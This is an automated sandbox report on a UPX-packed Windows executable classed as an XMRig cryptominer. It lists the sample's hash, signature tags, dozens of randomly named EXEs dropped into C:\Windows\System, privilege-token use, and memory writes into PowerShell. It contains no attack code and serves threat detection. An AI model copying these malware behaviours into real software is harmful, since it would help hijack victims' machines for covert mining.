Malware Analysis Report

2025-04-14 02:36

Sample ID 240603-mlpwbsbd7z
Target a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe
SHA256 6597f98d494e208272072bf9ac445bffed77b76d0572813dcf9f6cffab03a6c5
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6597f98d494e208272072bf9ac445bffed77b76d0572813dcf9f6cffab03a6c5

Threat Level: Known bad

The file a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

UPX packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 10:33

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 10:33

Reported

2024-06-03 10:35

Platform

win7-20240215-en

Max time kernel

150s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\WAuhOVQ.exe N/A
N/A N/A C:\Windows\System\rintTog.exe N/A
N/A N/A C:\Windows\System\mcMMfbL.exe N/A
N/A N/A C:\Windows\System\lNneVmx.exe N/A
N/A N/A C:\Windows\System\mRjzGeY.exe N/A
N/A N/A C:\Windows\System\WqdnKms.exe N/A
N/A N/A C:\Windows\System\gDnRKdI.exe N/A
N/A N/A C:\Windows\System\nePTOUp.exe N/A
N/A N/A C:\Windows\System\mvkeQJk.exe N/A
N/A N/A C:\Windows\System\NMqzNUh.exe N/A
N/A N/A C:\Windows\System\jlBrfgi.exe N/A
N/A N/A C:\Windows\System\tSWdktZ.exe N/A
N/A N/A C:\Windows\System\wnGMRUL.exe N/A
N/A N/A C:\Windows\System\bCeZwCM.exe N/A
N/A N/A C:\Windows\System\IrKNUgf.exe N/A
N/A N/A C:\Windows\System\tSMhgai.exe N/A
N/A N/A C:\Windows\System\IbfJoAi.exe N/A
N/A N/A C:\Windows\System\fjKnZXH.exe N/A
N/A N/A C:\Windows\System\qOkXlGW.exe N/A
N/A N/A C:\Windows\System\DVbxxSN.exe N/A
N/A N/A C:\Windows\System\NmbSPRS.exe N/A
N/A N/A C:\Windows\System\vacYWcB.exe N/A
N/A N/A C:\Windows\System\kfdPmuM.exe N/A
N/A N/A C:\Windows\System\BkAAeHt.exe N/A
N/A N/A C:\Windows\System\JEhxEtO.exe N/A
N/A N/A C:\Windows\System\AErWwdQ.exe N/A
N/A N/A C:\Windows\System\vXLthvm.exe N/A
N/A N/A C:\Windows\System\sSnOXqD.exe N/A
N/A N/A C:\Windows\System\fahgDuQ.exe N/A
N/A N/A C:\Windows\System\HLarVWJ.exe N/A
N/A N/A C:\Windows\System\AxjuPwF.exe N/A
N/A N/A C:\Windows\System\VMfmXYJ.exe N/A
N/A N/A C:\Windows\System\fGuWooB.exe N/A
N/A N/A C:\Windows\System\WVhKUyE.exe N/A
N/A N/A C:\Windows\System\cAbznPB.exe N/A
N/A N/A C:\Windows\System\gAgjZLh.exe N/A
N/A N/A C:\Windows\System\MPkidev.exe N/A
N/A N/A C:\Windows\System\rqydzbQ.exe N/A
N/A N/A C:\Windows\System\diHoRwC.exe N/A
N/A N/A C:\Windows\System\VTvmsCL.exe N/A
N/A N/A C:\Windows\System\mDycrsk.exe N/A
N/A N/A C:\Windows\System\mhyjQLP.exe N/A
N/A N/A C:\Windows\System\hzxiAwF.exe N/A
N/A N/A C:\Windows\System\GySxMVp.exe N/A
N/A N/A C:\Windows\System\xmmOQGq.exe N/A
N/A N/A C:\Windows\System\OmhZidH.exe N/A
N/A N/A C:\Windows\System\WLMLFgG.exe N/A
N/A N/A C:\Windows\System\jqiGgcv.exe N/A
N/A N/A C:\Windows\System\KKuckpm.exe N/A
N/A N/A C:\Windows\System\VpfYPxT.exe N/A
N/A N/A C:\Windows\System\UmgwDbx.exe N/A
N/A N/A C:\Windows\System\XPskEDu.exe N/A
N/A N/A C:\Windows\System\UexTSIq.exe N/A
N/A N/A C:\Windows\System\IfSwFqX.exe N/A
N/A N/A C:\Windows\System\iKlqifc.exe N/A
N/A N/A C:\Windows\System\nzWRbAk.exe N/A
N/A N/A C:\Windows\System\xMkAVui.exe N/A
N/A N/A C:\Windows\System\KxIFHGp.exe N/A
N/A N/A C:\Windows\System\ZvJCJxS.exe N/A
N/A N/A C:\Windows\System\SOnOQLb.exe N/A
N/A N/A C:\Windows\System\vwZmzEL.exe N/A
N/A N/A C:\Windows\System\NOzGkxb.exe N/A
N/A N/A C:\Windows\System\eydGKvI.exe N/A
N/A N/A C:\Windows\System\IyviKRT.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\ZPbQhwG.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\xnoNqRA.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\iVPjLmt.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\EGmxjkR.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\PllduFU.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\QZEjwNJ.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\OkWtxoB.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\jpvCBTy.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\cakpifg.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\AtcarTN.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\WgAxSyG.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\jvMmbnt.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\OkxeTOc.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\sHiaXNQ.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\MqaYPMQ.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\UNDjpax.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\NMqzNUh.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\gLynDUd.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\ruZbZoi.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\qkuSNMH.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZghTBOk.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\LTyhjaw.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\bLNQanz.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\ATkdvOi.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\cODbdyk.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\SnTFOGV.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\yberpOq.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\wPIacGL.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\EtUvQPC.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\muldlsX.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\iuYLFIh.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\ghpGgse.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\TQaUwak.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\uWqEImA.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\GTXatmA.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\UKAxjcX.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\hmSpUGW.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\WfcAWoH.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZSgsHyW.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\GySxMVp.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\uOXfMVi.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\aRrYrWy.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\AukMQuP.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\RWSqFbg.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\LqdKuOW.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\gIEJJbE.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\nMhjABV.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\dFAndRR.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\WVnXDdt.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\NUufAgp.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\osTGGlP.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\IhOKaMU.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\vflQUbX.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\wSRmNQG.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\MIYhJVS.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\AKqowkl.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\qXGYETe.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\gizzvXq.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\kJAMrrQ.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\dwBWdnk.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\HtMmHBu.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\cgtqHXf.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\aigWKJj.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\KanieAO.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2740 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2740 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2740 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2740 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\WAuhOVQ.exe
PID 2740 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\WAuhOVQ.exe
PID 2740 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\WAuhOVQ.exe
PID 2740 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\rintTog.exe
PID 2740 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\rintTog.exe
PID 2740 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\rintTog.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\mcMMfbL.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\mcMMfbL.exe
PID 2740 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\mcMMfbL.exe
PID 2740 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\mRjzGeY.exe
PID 2740 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\mRjzGeY.exe
PID 2740 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\mRjzGeY.exe
PID 2740 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\lNneVmx.exe
PID 2740 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\lNneVmx.exe
PID 2740 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe C:\Windows\System\lNneVmx.exe
